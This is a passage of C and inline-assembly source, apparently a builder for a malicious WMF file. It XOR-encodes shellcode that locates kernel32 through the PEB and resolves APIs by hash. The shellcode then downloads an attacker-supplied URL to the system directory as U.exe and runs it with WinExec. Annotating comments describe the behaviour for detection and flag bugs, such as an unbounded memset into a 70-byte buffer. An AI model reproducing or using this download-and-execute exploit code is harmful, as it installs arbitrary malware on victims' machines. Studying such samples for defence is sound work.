       memcpy(sc, pSc_addr, Sc_len);           // copy that code to the start of sc[]
    
    
       // Append the hash table directly after the code.
       memcpy(sc+Sc_len, (char *)dwHash, dwHashSize);
       Sc_len += dwHashSize;
    
       // Append the URL, including its terminating NUL, after the hash table.
       memcpy(sc+Sc_len, url1, strlen(url1)+1);
       Sc_len += strlen(url1)+1;
    
       // Key search: try 0xff down to 1 and take the first key for which no byte
       // in [DECODE_LEN, Sc_len) encodes to one of the values listed below.
       for(i=0xff; i>0; i--)
       {
           l = 0;                              // 0 = no forbidden byte seen for this key
           for(j=DECODE_LEN; j<Sc_len; j++)
           {
               if (
                      ((sc[j] ^ i) == 0x26) || // '&'
                      ((sc[j] ^ i) == 0x3d) || // '='
                      ((sc[j] ^ i) == 0x3f) || // '?'
                      ((sc[j] ^ i) == 0x40) || // '@'
                      ((sc[j] ^ i) == 0x00) || // NUL
                      ((sc[j] ^ i) == 0x0D) || // CR
                      ((sc[j] ^ i) == 0x0A)    // LF
                   )                           // set of byte values to avoid
               {
                   l++;                        // this key yields a forbidden byte; try the next one
                   break;
               };
           }
    
           if (l==0)
           {
               Enc_key = i;
    
               printf("[+] Find XOR Byte: 0x%02X\n", i);
               // Encode in place; bytes before DECODE_LEN are left untouched.
               for(j=DECODE_LEN; j<Sc_len; j++)
               {
                   sc[j] ^= Enc_key;
               }
    
               break;                          // key found and applied
           }
       }
    
       // l is still non-zero only when every candidate key was rejected.
       if (l!=0)
      {
           printf("[-] No xor byte found!\r\n");
           exit(-1);
       }
    
       // Patch the decoder stub. Both stores go through an unsigned char pointer,
       // so exactly one byte is written at each offset.
       *(unsigned char *)&sc[SC_LEN_OFFSET] = Sc_len;
       *(unsigned char *)&sc[ENC_KEY_OFFSET] = Enc_key;
    
       printf("[+] download url:%s\n", url1);
    }
    
    // Print the two-line usage text to standard output, then terminate the
    // process with exit status 0. Control never returns to the caller.
    int help()
    {
        fputs("Usage : wmf_expl.exe url [-t] \n", stdout);
        fputs("    the 't' option will let you test for the shellcode first\n", stdout);
        exit(0);
    }
    
    // Entry point of the builder. Usage, per help(): wmf_expl.exe url [-t].
    // Builds the payload for argv[1] with Make_ShellCode(), then writes two files
    // into the current directory:
    //   "xXx.UKT"       = head1 + sc + x0r filler + head2
    //   "shellcode.bin" = the first sizeof(sc)-1 bytes of sc
    // When the second argument is "-t" it also transfers control into sc[], so
    // the generated payload runs inside this very process on the build machine.
    // head1 and head2 are byte arrays defined earlier in the file.
    // NOTE(review): declared void yet ends with `return 0;`, and neither fopen()
    // result is checked before it is used.
    void main(int argc, char **argv)
    {
       WSADATA        wsa;
           unsigned char url[255]={0};
           BOOL b_test;                 // TRUE when "-t" was given
    	   FILE *shellcode2;            // handle for "shellcode.bin"
    
    	   FILE *file;                  // handle for "xXx.UKT"
    char data[333], x0r[70];            // data is not used in this function
    int size;
    int ssz; //= 16036-size;
    
           b_test=FALSE;
           if(argc<2)
                   help();              // prints usage and exits
    
           // Copies at most 255 bytes into the 255-byte url buffer.
           strncpy(url, argv[1], 255);
    		shellcode2 = fopen("shellcode.bin", "w+b"); // raw payload dump, binary mode
    
           if(argc == 3)
                   if(!strcmp(argv[2], "-t"))
                           b_test = TRUE;
    
       // Winsock is initialised here; no socket call appears in the visible code.
       WSAStartup(MAKEWORD(2,2),&wsa);
    
       Make_ShellCode(url);
    
       // strlen() measures sc only up to its first zero byte.
       size = sizeof(head1)+sizeof(head2)+strlen(sc);
    	ssz = 16036 - size;             // filler length so the parts total 16036 bytes
    	
       file = fopen("xXx.UKT", "w+b");
    	memset(x0r, 0x00, 70);
    	// NOTE(review): x0r holds 70 bytes, but this fill uses ssz as its length
    	// and nothing above bounds ssz to the buffer.
    	memset(x0r, 0x90, ssz);
    
    	fwrite(head1, sizeof(unsigned char), sizeof(head1), file);
    fwrite(sc, sizeof(char), strlen(sc), file);
    fprintf(file, "%s", x0r);           // filler is written as a C string
    fwrite(head2, sizeof(unsigned char), sizeof(head2), file);
    fclose(file);
       //printf("%d - %d\n", size, ssz);
       	fwrite(sc, 1, sizeof(sc)-1, shellcode2);
    					fclose(shellcode2);
    	//				printf("%d - size of shellcode\n", strlen(sc));
           if(b_test)
           {
                   printf("Testing the shellcode...\n");
                  //  printf("%s\n", sc); // shellcode in text mode =)
                   // Casts the data buffer to a function pointer and calls it:
                   // the payload executes in the builder's own process.
                   ((void (*)(void)) &sc)();
           }
       return 0;
         } 
    
    // ShellCode function
    // Payload template, written as MSVC inline assembly for 32-bit x86.
    // It is not meant to be called like a normal function: Make_ShellCode() scans
    // this routine's bytes for SEARCH_STR markers (presumably emitted by the
    // PROC_BEGIN / PROC_END macros, which are defined outside this view) and
    // copies what lies between them.
    //
    // Behaviour visible below, useful as detection and triage context:
    //   1. a decoder stub XORs the bytes that follow it, in place, with a
    //      one-byte key;
    //   2. API addresses are found by walking a module's PE export table and
    //      comparing name hashes, so the only library name present as data is
    //      the stack-built "urlmon";
    //   3. the appended URL is fetched with URLDownloadToFileA into
    //      <system directory>\U.exe, that file is started with WinExec, and the
    //      host process is then ended with ExitProcess.
    // The ADDR_* operands are macros defined outside this view; presumably they
    // address the slots where GetProcAddress_fun stored each resolved function.
    void ShellCode()
    {
       __asm
       {
           PROC_BEGIN                          // macro marking the start of the copied region
    //--------------------------------------------------------------------
    //
    // Decoder stub: jmp/call/pop obtains the stub's own address at run time,
    // then the loop XORs the bytes that follow with the key.
    //
    //--------------------------------------------------------------------
           jmp     short decode_end
    
    decode_start:
           pop     ebx                         // return address of the call below = address of decode_ok
           dec     ebx                         // bias by one: the loop index runs from ecx down to 1
           xor     ecx,ecx
           mov     cl,0xFF                     // length placeholder; presumably the byte patched at SC_LEN_OFFSET
    
       decode_loop:
           xor     byte ptr [ebx+ecx],ENC_KEY     // key placeholder; presumably the byte patched at ENC_KEY_OFFSET
           loop    decode_loop
           jmp     short decode_ok
    
    decode_end:
           call    decode_start                // pushes the address of decode_ok
    
    decode_ok:
    
    //--------------------------------------------------------------------
    //
    // Main payload body (the region the decoder stub has just decoded)
    //
    //--------------------------------------------------------------------
           jmp     sc_end
    
    sc_start:
           // The call at sc_end pushed the address of the first byte after the
           // code, which is where Make_ShellCode() appends the hash table.
           pop     edi                         // edi = start of the hash table
    
           // Locate kernel32.dll through the process environment block.
           mov     eax, fs:0x30                // PEB
           mov     eax, [eax+0x0c]             // loader data (labelled PROCESS_MODULE_INFO by the author)
           mov     esi, [eax+0x1c]             // first entry of the initialisation-order module list
           lodsd                               // eax = dword at [esi]; the author labels it InInitOrder.blink
           mov     ebp, [eax+8]                // ebp = module base taken from that entry (kernel32.dll per the author)
    
           mov     esi, edi                    // esi = start of the hash table as well
    
           // Resolve four hashes against kernel32; each call replaces one hash
           // in the table with the function address and advances edi by 4.
           push    4
           pop     ecx
    
       getkernel32:
           call    GetProcAddress_fun
           loop    getkernel32
    
           // Build the string "urlmon" on the stack and load that library.
           push    0x00006e6f                 // "on" plus terminating NULs
           push    0x6d6c7275                 // "urlm"
           push    esp                        // pointer to "urlmon"
           call    ADDR_LoadLibraryA          // LoadLibraryA("urlmon");
    
           mov     ebp, eax                   // ebp = urlmon.dll base address
    
    /*
           push    1
           pop     ecx
    
       geturlmon:
           call    GetProcAddress_fun
           loop    geturlmon
    */
           call    GetProcAddress_fun         // resolve the single urlmon hash
    
           // edi has now moved past the whole hash table and points at the URL string
    
    LGetSystemDirectoryA:
           sub     esp, 0x20                   // 32-byte stack buffer for the path
           mov     ebx, esp                    // ebx = buffer address
    
           push    0x20                        // buffer size argument
           push    ebx                         // buffer argument
          call   ADDR_GetSystemDirectoryA     // GetSystemDirectoryA(buffer, 0x20)
    
    LURLDownloadToFileA:
           // eax = length of the system directory path written to the buffer
           // Append "\U.exe" to it; this is the path the download is saved to.
           mov     dword ptr [ebx+eax], 0x652E555C           // bytes "\U.e"
           mov     dword ptr [ebx+eax+0x4], 0x00006578       // bytes "xe" plus terminating NULs
           xor     eax, eax
           push    eax                         // fifth argument = 0
           push    eax                         // fourth argument = 0
           push    ebx                         // destination file: <system directory>\U.exe
           push    edi                         // source URL
           push    eax                         // first argument = 0
    call    ADDR_URLDownloadToFileA     // URLDownloadToFileA
    
    //LWinExec:
                   // esp is back at the path buffer here, assuming the two API
                   // calls above removed their own arguments (stdcall).
                   mov     ebx, esp
                   push    1// uCmdShow = 1 (visible window); author's note: 0 would be SW_HIDE
                   push    ebx
                   call    ADDR_WinExec                // WinExec(<system directory>\U.exe)
    
    Finished:
           //push    1
           call    ADDR_ExitProcess            // ExitProcess(); ends the host process
    
    // Resolve one function by hash.
    // In:  ebp = module base, edi = address of the hash to look up.
    // Out: the function address is stored over that hash and edi advances by 4.
    // ecx and esi are saved and restored; eax, ebx and edx are overwritten.
    GetProcAddress_fun:
           push    ecx
           push    esi
    
           mov     esi, [ebp+0x3C]             // e_lfanew: offset of the PE header
           mov     esi, [esi+ebp+0x78]         // export directory RVA
           add     esi, ebp                    // RVA -> address
           push    esi                         // keep the export directory for later
           mov     esi, [esi+0x20]              // AddressOfNames RVA
           add     esi, ebp                    // RVA -> address
           xor     ecx, ecx
           dec     ecx                         // name index starts at -1, incremented before use
    
       find_start:
           inc     ecx                         // index of the name about to be hashed
           lodsd                               // eax = RVA of the next export name
           add     eax, ebp                    // RVA -> address
           xor     ebx, ebx                    // hash accumulator = 0
    
       hash_loop:
           movsx   edx, byte ptr [eax]         // next character, sign-extended
           cmp     dl, dh                      // equal only for the NUL terminator when names are ASCII
           jz      short find_addr
           ror     ebx, HASH_KEY               // same rotate as GetHash()
           add     ebx, edx                    // same add as GetHash()
           inc     eax
           jmp     short hash_loop
    
       find_addr:
           cmp     ebx, [edi]                  // compare with the wanted hash
           jnz     short find_start            // no match: try the next export name
           pop     esi                         // esi = export directory
           mov     ebx, [esi+0x24]             // AddressOfNameOrdinals RVA
           add     ebx, ebp                    // RVA -> address
           mov     cx, [ebx+ecx*2]             // ordinal for the matched name
           mov     ebx, [esi+0x1C]             // AddressOfFunctions RVA
           add     ebx, ebp                    // RVA -> address
           mov     eax, [ebx+ecx*4]            // function RVA
           add     eax, ebp                    // RVA -> address
           stosd                               // store the address over the hash; edi += 4
    
           pop     esi
           pop     ecx
           ret
    
    sc_end:
           call sc_start                       // pushes the address of the data that follows the code
    
           PROC_END                            // macro marking the end of the copied region
       }
    }



